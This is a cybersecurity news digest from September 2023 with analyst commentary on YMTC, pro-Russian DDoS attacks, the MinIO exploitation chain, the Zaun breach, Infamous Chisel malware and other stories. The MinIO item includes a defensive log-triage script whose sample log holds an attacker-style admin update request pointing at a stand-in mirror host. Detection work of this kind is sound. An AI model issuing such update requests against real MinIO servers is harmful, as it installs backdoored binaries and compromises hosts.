Daily Drop (589): China's YMTC, NoName057(16), MSS: US Diplomacy, UK Military Data Breach, China & Japan, DPRK & RU, Graphcore Demands Inclusion, X: Biometrics, South Korea's Counteraction
09-05-23
Tuesday, Sep 05, 2023 // (IG): BB // Financial Enabler PODCAST // Coffee for Bob
China's YMTC Navigates US Restrictions
Analyst Comments: YMTC's ability to reduce its dependency on US and other foreign chip equipment suppliers is a testament to China's resilience and adaptability in the face of international trade challenges. This development could potentially undermine Washington's strategy of using export controls to decelerate China's advancements in chip manufacturing. With local vendors like Naura Technology and Advanced Micro-Fabrication Equipment stepping up, and the company's strategic moves to "de-Americanise" its production line, YMTC is positioning itself to compete with global giants like Samsung and Micron. The company's resurgence, backed by substantial government funding and strategic partnerships, underscores China's determination to bolster its domestic semiconductor industry.
FROM THE MEDIA: Yangtze Memory Technologies Corp (YMTC), China's premier memory-chip manufacturer, is set to commence operations at a new facility as early as next year. This move is seen as a significant boost to Beijing's ambition of achieving semiconductor self-reliance, especially amidst stringent US export controls. These US-imposed restrictions, initiated last October, had initially halted the construction of a state-of-the-art fabrication plant in Wuhan. However, YMTC has been rigorously testing locally produced tools and is now poised to depend more on domestic suppliers for replacements. This shift is anticipated to bring the new plant online by the latter half of 2024.
READ THE STORY: FT
NoName057(16): The Persistent Lone-Wolf in Cyber Warfare
Analyst Comments: NoName057(16) stands out in the cybercrime landscape due to its disciplined, methodical approach and its independence from other hacker groups. Their consistent attacks, even if not technically sophisticated, cause significant disruptions, underscoring the need for enhanced cybersecurity measures. The group's ability to rally volunteers and educate them on basic hacking concepts suggests a well-organized, motivated entity. Their focus on Western targets, especially those supporting Ukraine, indicates a geopolitical motive behind their operations. The group's persistence and determination to "respond in kind" to perceived anti-Russian actions suggest that they will remain a significant threat in the foreseeable future.
FROM THE MEDIA: NoName057(16), a pro-Russian hacktivist group, has been consistently launching distributed denial-of-service (DDoS) attacks on European entities, particularly financial institutions, government websites, and transportation services. Recently, they disrupted several banks and financial institutions in the Czech Republic and Poland, viewing them as adversaries because of their support for Ukraine. Unlike other pro-Kremlin hacktivist groups, NoName057(16) operates alone. Pascal Geenens, director of cyber threat intelligence at Radware, describes them as a "lone wolf" in the Russian cybercrime landscape: they do not form alliances with other hackers and use a custom-built toolkit, DDoSia, for their attacks. The group is methodical, targeting 5-15 entities daily after reconnaissance, and it documents its claimed successes with Check Host reports. Since the start of the year, they have claimed over 170 attacks, initially focusing on Ukrainian news sites before shifting to NATO-associated targets.
READ THE STORY: The Record
China’s Spy Agency Criticizes US Diplomacy; Hints at Risk to Upcoming Presidential Meeting
Analyst Comments: The strong response from China's primary intelligence agency underscores the complexities and sensitivities in the US-China relationship. The upcoming meeting between the two nations' leaders will be closely watched, as it could set the tone for future interactions and negotiations. The US's approach to Taiwan and other contentious issues will likely remain central points of contention.
FROM THE MEDIA: China's Ministry of State Security (MSS), the nation's primary intelligence agency, has expressed concerns over the US's recent diplomatic gestures, describing them as a blend of engagement and containment. This criticism suggests potential complications for a prospective meeting between Chinese President Xi Jinping and US President Joe Biden scheduled for November. The MSS's statement comes on the heels of a visit to Beijing by US Commerce Secretary Gina Raimondo. While Raimondo spoke positively of her interactions with Chinese officials, she also highlighted the growing perception among US businesses that China is becoming "uninvestable." The MSS's official WeChat account released a statement addressing recent visits by US officials to China, emphasizing that the Biden administration's approach seemed reminiscent of past US strategies, which combined "engagement and containment." The agency pointed to the US's approval of arms sales and military financing to Taiwan, a territory over which China claims sovereignty, as evidence of this mixed approach.
READ THE STORY: FT
MinIO Storage System Vulnerabilities Exploited by Hackers
Analyst Comments: The attack chain studied by Security Joes shows the threat actor weaponizing these flaws to obtain admin credentials. With that access, they abused MinIO's built-in update mechanism, issuing an update command that pointed at an attacker-controlled MIRROR_URL, to replace the genuine MinIO server binary on the host with a trojanized version. The modified binary adds an endpoint that receives and executes commands via HTTP requests, acting as a backdoor; those commands run with the system permissions of the user who started the MinIO process. The altered binary mirrors a publicly available exploit named Evil MinIO, published on GitHub in early April 2023, although there is no evidence linking the exploit's author to the attackers. The threat actor was comfortable with bash scripts and Python, and used the backdoor to fetch additional payloads from a remote server through a downloader script for post-exploitation activity. The practical takeaways are to treat any MinIO admin credential exposure as a full host compromise, to restrict who can call the admin update API and from where, and to verify the integrity of the running MinIO binary on any instance that was reachable while unpatched.
FROM THE MEDIA: Hackers have exploited high-severity security vulnerabilities in the MinIO high-performance object storage system to achieve unauthorized code execution on affected servers. The cybersecurity and incident response firm Security Joes reported that the intrusion used a publicly available exploit chain to compromise the MinIO instance. Two high-severity vulnerabilities, CVE-2023-28432 (CVSS score 7.5) and CVE-2023-28434 (CVSS score 8.8), were exploited; both were fixed in MinIO RELEASE.2023-03-20T20-16-18Z. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the former to its Known Exploited Vulnerabilities (KEV) catalog on April 21, 2023. Together, these vulnerabilities can expose sensitive information from the compromised installation and enable remote code execution (RCE) on the host where the MinIO application is running.
READ THE STORY: THN
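As an added example (not code from the Security Joes report, the THN article, or the MinIO project), the script below shows two checks an operator can run after reading the story above: whether a MinIO release tag predates the fix for both CVEs, and a triage of access-log lines for the two steps of the chain described in the Analyst Comments (a credential-leaking request to the cluster bootstrap endpoint, and an admin update call pointing at an untrusted mirror). The log format, the cluster peer range, the host names and the sample lines are all constructed for the example; the bootstrap path `/minio/bootstrap/v1/verify` and the `updateURL` query parameter of the admin update API are assumptions based on MinIO's public API and should be confirmed against your own deployment's logs before the rule is relied on.

```python
"""Post-incident checks for the MinIO attack chain discussed above.

Added example, not code from the page. Assumptions (not from the page):
  * access logs are in the constructed form "<src_ip> <method> <path> <status>";
  * the CVE-2023-28432 credential leak is reached via /minio/bootstrap/v1/verify,
    an endpoint only cluster peers should ever call;
  * the update abuse shows up as a call to the admin update API whose
    updateURL query parameter names the attacker's mirror.
"""
from datetime import datetime
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, urlsplit

# Release in which both CVE-2023-28432 and CVE-2023-28434 were fixed.
FIXED_RELEASE = "RELEASE.2023-03-20T20-16-18Z"
BOOTSTRAP_VERIFY = "/minio/bootstrap/v1/verify"   # assumed endpoint path
ADMIN_UPDATE = "/minio/admin/v3/update"            # assumed endpoint path
TRUSTED_MIRROR_HOSTS = {"dl.min.io"}               # official download host
CLUSTER_NETS = [ip_network("10.0.0.0/24")]         # constructed peer range


def parse_release(tag: str) -> datetime:
    """Parse a MinIO release tag such as RELEASE.2023-03-20T20-16-18Z."""
    return datetime.strptime(tag, "RELEASE.%Y-%m-%dT%H-%M-%SZ")


def is_vulnerable_release(tag: str) -> bool:
    """True when the server release predates the fix for both CVEs."""
    return parse_release(tag) < parse_release(FIXED_RELEASE)


def _from_cluster(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in CLUSTER_NETS)


def triage_line(line: str):
    """Return a finding for one access-log line, or None if it looks benign."""
    src, _method, target, _status = line.split()
    parts = urlsplit(target)
    # Step 1 of the chain: a non-peer asking the bootstrap endpoint, which in
    # vulnerable releases answered with environment variables including the
    # root credentials.
    if parts.path == BOOTSTRAP_VERIFY and not _from_cluster(src):
        return f"bootstrap verify from non-peer {src} (CVE-2023-28432 credential leak)"
    # Step 2 of the chain: an admin-driven update pulled from a mirror that is
    # not the official download host.
    if parts.path == ADMIN_UPDATE:
        for url in parse_qs(parts.query).get("updateURL", []):
            host = urlsplit(url).hostname or ""
            if host not in TRUSTED_MIRROR_HOSTS:
                return f"admin update from untrusted mirror {host} requested by {src}"
    return None


def triage(lines):
    """Run triage_line over a log and keep only the findings, in log order."""
    return [f for f in map(triage_line, lines) if f]


# Constructed sample log: one legitimate peer call, one legitimate update from
# the official mirror, and the two requests an attacker following the
# described chain would leave behind.
SAMPLE_LOG = [
    "10.0.0.12 POST /minio/bootstrap/v1/verify 200",
    "203.0.113.7 POST /minio/bootstrap/v1/verify 200",
    "10.0.0.5 GET /minio/health/live 200",
    "10.0.0.5 POST /minio/admin/v3/update?updateURL=https://dl.min.io/server/minio/release/linux-amd64/minio.sha256sum 200",
    "203.0.113.7 POST /minio/admin/v3/update?updateURL=http://203.0.113.9/minio.sha256sum 200",
]

if __name__ == "__main__":
    print("vulnerable:", is_vulnerable_release("RELEASE.2023-03-13T19-46-17Z"))
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Two caveats when adapting this: single-node deployments may never log bootstrap traffic at all, so an empty result from the first rule is not evidence of safety there, and a successful update call from a trusted-looking source is still worth checking against the hash of the binary actually on disk, since the credential theft in step one means the attacker can make the call look like an administrator's.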
UK Military Data Breach via Outdated Windows 7 System
Analyst Comments: The data breach at Zaun is a stark reminder of the exposure that outdated systems introduce, even in organisations serving high-security customers. The fact that the entry point was a Windows 7 PC, an operating system for which Microsoft ended mainstream support in 2015 and all regular support in January 2020, emphasizes the importance of retiring unsupported systems rather than merely patching supported ones. The potential compromise of data relating to military and research sites is alarming given the strategic importance of those sites. The incident also highlights that suppliers, not only the end customers, must maintain robust cybersecurity measures: an attacker who cannot reach a hardened target directly will go after the third parties that hold its drawings, site details and access arrangements, so every link in the supply chain needs securing.
FROM THE MEDIA: A UK-based supplier of high-security fencing, Zaun, which caters to military bases, suffered a data breach through an outdated Windows 7 PC. The Wolverhampton-based company believes no classified information was compromised. However, reports suggest that the attackers might have accessed data that could help an adversary gain entry to some of the UK's most sensitive military and research sites. The LockBit ransomware group was identified as the perpetrator, and Zaun acknowledged the potential exfiltration of 10GB of data. The company also admitted that the breach might have extended beyond the initial Windows 7 entry point. Zaun has informed the National Cyber Security Centre (NCSC) and the UK's Information Commissioner's Office (ICO) about the incident.
READ THE STORY: The Register
U.S. Restricts Chip Exports to China Over Military Concerns
Analyst Comments: The U.S.'s decision to restrict chip exports is a significant move in the ongoing technological and geopolitical tussle between the two superpowers. By withholding access to advanced technology, the U.S. is signaling its intent to maintain a technological edge, especially in areas that have potential military implications. This move also underscores the importance of the semiconductor industry in global geopolitics and highlights the need for nations to bolster their domestic technological capabilities. The revelation of cyber intrusions faced by top U.S. officials further accentuates the multi-faceted nature of the U.S.-China rivalry, extending beyond trade and into the realms of cybersecurity and digital espionage.
FROM THE MEDIA: The U.S. has made a strategic decision to withhold the export of its top-tier supercomputer chips to China. This move, confirmed by U.S. Secretary of Commerce, Gina Raimondo, is rooted in concerns over potential military applications of these chips by China. Amidst escalating U.S.-China tensions, Raimondo's recent statements emphasize America's intent to limit China's military capabilities. The U.S. aims to "choke" China's military growth by preventing access to advanced American technology. Despite the challenges, including a cyber intrusion Raimondo faced from Chinese sources during her diplomatic trip to Beijing, the U.S. remains committed to its stance.
READ THE STORY: tom'sHARDWARE
Suspected Chinese Cyber Espionage Targets Japan's Cyber Security Agency
Analyst Comments: The breach at Japan's cyber security agency is a concerning development in the realm of international cyber espionage. The fact that the breach remained undetected for months highlights potential vulnerabilities in Japan's cyber defense mechanisms. The suspected involvement of Chinese state-backed hackers further complicates the geopolitical landscape, especially given the ongoing tensions in the Indo-Pacific region. The repeated breaches, as indicated by the Washington Post report and the recent Financial Times revelations, suggest a systematic effort by Chinese hackers to test and exploit Japan's cyber defenses. The timing of these breaches is also crucial. With escalating tensions over Taiwan and the importance of intelligence sharing between the US and Japan, the security of Japan's cyber infrastructure becomes even more critical. The US's potential reconsideration of intelligence sharing with Japan, due to these breaches, could have significant implications for regional security dynamics.
FROM THE MEDIA: Japan's national cyber security agency experienced a significant security breach in October 2022, which was only disclosed in August 2023. Anonymous sources have informed the Financial Times that state-backed Chinese hackers are believed to be responsible for this breach. The National Center of Incident Readiness and Strategy for Cybersecurity (NISC) has not officially attributed the attack to any group. However, these allegations are supported by a previous report from the Washington Post, which claimed that Chinese hackers had infiltrated Japan's defense network in 2020 and remained undetected for years.
READ THE STORY: CPO
North Korea's Kim to Discuss Arms Sales with Russia
Analyst Comments: The potential meeting between Kim Jong Un and Vladimir Putin could have significant geopolitical implications. If the two leaders agree on arms sales, it would mark a significant escalation in military ties between North Korea and Russia. This comes at a time when Moscow's forces are trying to repel a Ukrainian counteroffensive in the southern and eastern parts of the country. The U.S. is particularly alarmed by the possibility of increased weapons trade between the two nations given the current dynamics of the Ukraine conflict. The visit by Sergei Shoigu, the Russian defense minister, to North Korea last month, where he reportedly tried to secure artillery ammunition for Russia, underscores the urgency of the situation. The White House's National Security Council spokesperson, Adrienne Watson, has urged North Korea to halt its arms negotiations with Russia.
FROM THE MEDIA: Kim Jong Un, North Korea's leader, is reportedly planning a visit to Russia to discuss potential weapons sales with Russian President Vladimir Putin. This information comes from a senior White House official and highlights the increasing military ties between Russia and North Korea, especially as Russian forces face challenges in Ukraine. The U.S. has expressed concerns over the potential growth of arms trade between Moscow and Pyongyang during this critical phase of the Ukraine conflict.
READ THE STORY: FT
Russian Data Localization Laws Bite
Analyst Comments: The imposition of these fines on such prominent platforms signals Russia's intent to strictly enforce its data localization laws. For international companies operating in or considering entering the Russian market, this development serves as a stark reminder of the importance of understanding and complying with local data regulations. The fines, although significant, might not be debilitating for these tech giants, but the reputational impact and the potential for stricter future regulations or even bans cannot be overlooked.
FROM THE MEDIA: In a recent move underscoring the strict enforcement of data localization laws in Russia, a Moscow court has fined two major tech platforms: Match Group's Tinder and the streaming service Twitch. Tinder was fined 10 million roubles (approximately $104,000), while Twitch faces a slightly steeper penalty of 13 million roubles (around $135,000). The fines were levied for the companies' repeated failure to store Russian users' data within the country, as Russian data localization regulations require.
READ THE STORY: THN
Graphcore Demands Inclusion in UK's £900mn Supercomputer Project
Analyst Comments: Graphcore's push for a significant role in the UK's supercomputer project underscores the challenges tech start-ups face in securing government contracts when competing against global giants. The company's potential move to the US highlights the broader issue of tech companies seeking more favorable financial and regulatory environments in which to grow and compete on the global stage. The UK government's decision will not only affect Graphcore but could set a precedent for how the country supports domestic tech innovation in the face of international competition.
FROM THE MEDIA: Graphcore, one of the UK's leading tech start-ups, is pushing for its chips to be used in a significant portion of the UK government's new £900mn supercomputer project. This move comes as the company faces competition from US-based rivals, notably Nvidia. Nigel Toon, Graphcore's Chief Executive, has communicated to UK ministers the importance of this deal, especially at a time when the company's Silicon Valley investors are suggesting a potential relocation to the US to benefit from the country's generous semiconductor subsidies. The UK's planned "exascale" supercomputer, announced by UK Chancellor Jeremy Hunt, is intended to be several times more powerful than current UK capabilities. Its primary functions will be research in areas such as climate change, drug discovery, and artificial intelligence (AI).
READ THE STORY: FT
X (Formerly Twitter) to Collect Biometric Data from Premium Users to Combat Impersonation
Analyst Comments: X's decision to collect biometric data is presented as a security measure: by targeting impersonation and fraud, X aims to create a safer environment for its premium users. However, the move raises pertinent questions about user privacy, especially given the lack of clarity on how the data will be collected, where it will be stored and how long it will be retained. A biometric template and a government ID are high-value records that cannot be rotated like a password, so X will need to be transparent about retention, access controls and deletion to maintain user trust. The addition of features like encrypted DMs and the emphasis on using only public data for AI training, as confirmed by owner Elon Musk, are steps in the right direction.
FROM THE MEDIA: X, previously known as Twitter, has announced changes to its privacy policy that will allow the collection of biometric data from its users. This move aims to address issues of fraud and impersonation on the platform. The updated policy, which will be effective from September 29, 2023, states that with user consent, biometric information may be collected and used for safety, security, and identification purposes. The social media giant clarified to Bloomberg that this change will only affect premium users. The biometric matching process is intended to bolster the platform's security by countering impersonation attempts. Users will have the option to provide a government ID and a photo for identity matching or verification using their biometric data. However, the specifics of how this data will be collected and the duration of its retention remain unclear.
READ THE STORY: THN
Boosting Cybersecurity Diversity: Craigslist Founder's Generous Donation
Analyst Comments: Craig Newmark's donation underscores the importance of diversifying the cybersecurity workforce. By supporting HBCUs, Newmark is not only investing in the future of cybersecurity but also ensuring that underrepresented groups have a seat at the table. The collaboration between HBCUs and cybersecurity firms will provide students with invaluable real-world experiences and insights, preparing them for a thriving career in the sector. As the demand for cybersecurity professionals continues to grow, initiatives like these are crucial for addressing the talent gap and ensuring a holistic approach to cybersecurity challenges.
FROM THE MEDIA: Craig Newmark, the founder of Craigslist, has generously donated $200,000 to a cybersecurity initiative at historically black colleges and universities (HBCUs). This initiative aims to provide more opportunities for Black students in the cybersecurity domain. Newmark's philanthropic endeavors through his organization, Craig Newmark Philanthropies, have consistently focused on expanding the U.S. cyber workforce. On August 28, the National Cybersecurity Alliance (NCA) received the grant, which will support the "See Yourself In Cyber" HBCU Career Program. This program, funded by entities like the Cybersecurity and Infrastructure Security Agency (CISA) and Dell, offers students networking opportunities, mentorship programs, training sessions, and interactions with cybersecurity experts.
READ THE STORY: The Record
Rethinking IT Qualifications: Are Open-Book Exams the Future?
Analyst Comments: In today's digital age, where vast amounts of information are at one's fingertips, the real skill lies in effectively searching, filtering, and synthesizing this data. While formal qualifications might offer a foundational understanding, they might not necessarily equip an individual to navigate the ever-evolving IT realm. Microsoft's initiative of open-book exams is a commendable step, albeit restricted to its ecosystem. The article advocates for a holistic, vendor-neutral system that fosters continuous learning, catering to individuals at various career stages. While the tech sector has the resources to establish such an educational framework, the motivation to actualize it is still in question.
FROM THE MEDIA: Rupert Goodwins, in his article on The Register, critically examines the changing dynamics of IT qualifications, focusing on Microsoft's transition to open-book exams, the ability of ChatGPT to pass law exams, and the persistent difficulty of recruiting competent IT personnel. Goodwins argues that the traditional examination system may be outdated when an AI system like ChatGPT can pass it. In an age where information is ubiquitously available, the emphasis should be on an individual's ability to efficiently search, filter, and synthesize information rather than simply possess it. While Microsoft's open-book exams are a commendable initiative, they are confined to Microsoft's ecosystem, which limits their broader applicability.
READ THE STORY: The Register
The Evolving Cyber Tactics of Russia: A Deep Dive into the "Infamous Chisel" Malware
Analyst Comments: The 'Infamous Chisel' malware comprises several components, each serving a distinct function. Notably, one component, 'stl', collects data related to the device's connection to the Starlink satellite constellation. Given the Ukrainian forces' reliance on SpaceX’s Starlink for communication, especially in areas with compromised connectivity, this component's inclusion is particularly concerning. Paul Chichester, the director of operations at the NCSC, emphasized that this campaign signifies a new phase in Russia's cyber strategies against Ukraine and its allies. The UK remains committed to supporting Ukraine against such cyber threats and will continue to expose and counter Russian cyber aggression.
FROM THE MEDIA: The UK's National Cyber Security Centre (NCSC), in collaboration with international partners, has published a report detailing a new malware, named 'Infamous Chisel', linked to the Sandworm group and specifically targeting Android devices used by the Ukrainian military. The malware is designed to steal information and has been found on devices used by Ukrainian military personnel on the front lines. Despite its relatively standard components and low-to-medium sophistication, the malware poses a significant threat because of the sensitive Ukrainian military data it can exfiltrate. Notably, the malware makes no significant effort to hide its activity, suggesting its operators were not concerned about detection.
READ THE STORY: Tech Central
South Korea's Counteraction Against North Korea's Crypto Exploits
Analyst Comments: South Korean intelligence reports indicate that North Korea successfully stole approximately $1.28 billion in Bitcoin and Ethereum in 2022 alone. Yoon Han-hong of the People Power Party pointed out that an estimated $52.46 million from North Korean crypto hacking activities likely passed through South Korean cryptocurrency exchanges. This is further underscored by the fact that North Korean hackers have reportedly accumulated over $3 billion over the past five years, with a significant portion of these funds being funneled into North Korea's missile program. In addition to the new bill, the Yoon administration is also planning to establish a national cybersecurity committee under the president's direct oversight. This committee's primary objective is to enhance South Korea's defenses against foreign cyberattacks.
FROM THE MEDIA: South Korea is escalating its efforts to counter North Korea's exploitation of cryptocurrencies to finance its prohibited weapons programs. On August 29, South Korean President Yoon Suk Yeol unveiled a new bill specifically targeting North Korean virtual assets, following 10 months of intensive discussions to reinforce South Korea's existing sanctions against North Korea. The revised bill, which was previously sent back by the president for further enhancement, now includes specific strategies to "track and neutralize" cryptocurrencies that North Korea has illicitly acquired through cyberattacks. The president emphasized the importance of actively deterring North Korea from various illegal activities, including cryptocurrency theft, which serves as a primary funding source for its nuclear and missile development.
READ THE STORY: BE(IN)CRYPTO
Meta Disrupts Major Disinformation Campaigns from China and Russia
Analyst Comments: The revelation by Meta underscores the persistent threat of disinformation campaigns on major social media platforms. The scale and scope of these operations, especially the Chinese campaign targeting over 50 apps, highlight the challenges faced by tech companies in identifying and countering such covert activities. The association of the Chinese operation with individuals linked to law enforcement raises concerns about state-sponsored disinformation campaigns. The Russian operation's focus on creating fake news articles to influence perceptions about the conflict in Ukraine demonstrates the geopolitical implications of such campaigns. Both operations, despite their vast networks, seem to have limited engagement among genuine communities, indicating the platforms' increasing ability to detect and counter such activities.
FROM THE MEDIA: Meta, the parent company of Facebook, has announced the disruption of two significant covert influence operations originating from China and Russia, blocking thousands of accounts and pages linked to the campaigns across its platforms. The Chinese disinformation network spanned more than 50 apps and sites, including major platforms like Facebook, Instagram, YouTube, TikTok, and Reddit. Guy Rosen, Meta's Chief Information Security Officer, said the network on Meta's own platforms consisted of 7,704 Facebook accounts, 954 Pages, 15 Groups, and 15 Instagram accounts. These accounts were operated by individuals dispersed across China and posted content about China and the Xinjiang region, criticism of U.S. and Western foreign policy, and attacks on critics of the Chinese government. The operation, known as Spamouflage (or DRAGONBRIDGE), has been active since 2018 and has links to individuals associated with Chinese law enforcement.
READ THE STORY: THN
Items of interest
Strengthening Ties: India-Africa's Evolving Partnership
Analyst Comments: The India-Africa relationship is evidently on an upward trajectory, with both regions recognizing the mutual benefits of collaboration. The challenges posed by global events have only underscored the importance of their partnership. While the past has seen fruitful collaborations, especially in development and capacity-building, the future holds promise in newer areas like the blue economy and media. The emphasis on creating a multipolar world order indicates a shared vision for global balance and equity. However, the success of this partnership will hinge on addressing challenges, leveraging opportunities like the AfCFTA, and ensuring that collaborations align with the unique needs and aspirations of both regions.
FROM THE MEDIA: In a recent interview with Kester Kenn Klomegah, Samir Bhattacharya of the Vivekananda International Foundation delved into the dynamics of the India-Africa relationship amid a changing global landscape. A world still reeling from the COVID-19 pandemic and the Ukraine conflict has seen regions like Africa bear the brunt of rising costs and humanitarian crises, and in these turbulent times India's role in Africa's recovery has become significant. The partnership has grown organically over the years, encompassing developmental projects, military collaboration, and capacity-building initiatives. The Export-Import Bank of India has emerged as a significant financier of African projects, and there is a mutual emphasis on skill development, especially with the onset of the fourth industrial revolution.
READ THE STORY: ModernDiplomacy
How Africans see Chinese and Indians in Africa (Video)
FROM THE MEDIA: Chinese and Indian nationals are the foreigners you will find most often in Africa, but what do Africans think about them?
How India and Africa are planning to deepen defense cooperation (Video)
FROM THE MEDIA: As India and the African Union held their first Army exercise in Pune, watch #ThePrint #Defencescope by Deputy Editor Snehesh Alex Philip and Senior Multimedia Editor Sajid AliMir to know how India & Africa are planning to deepen defense cooperation.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.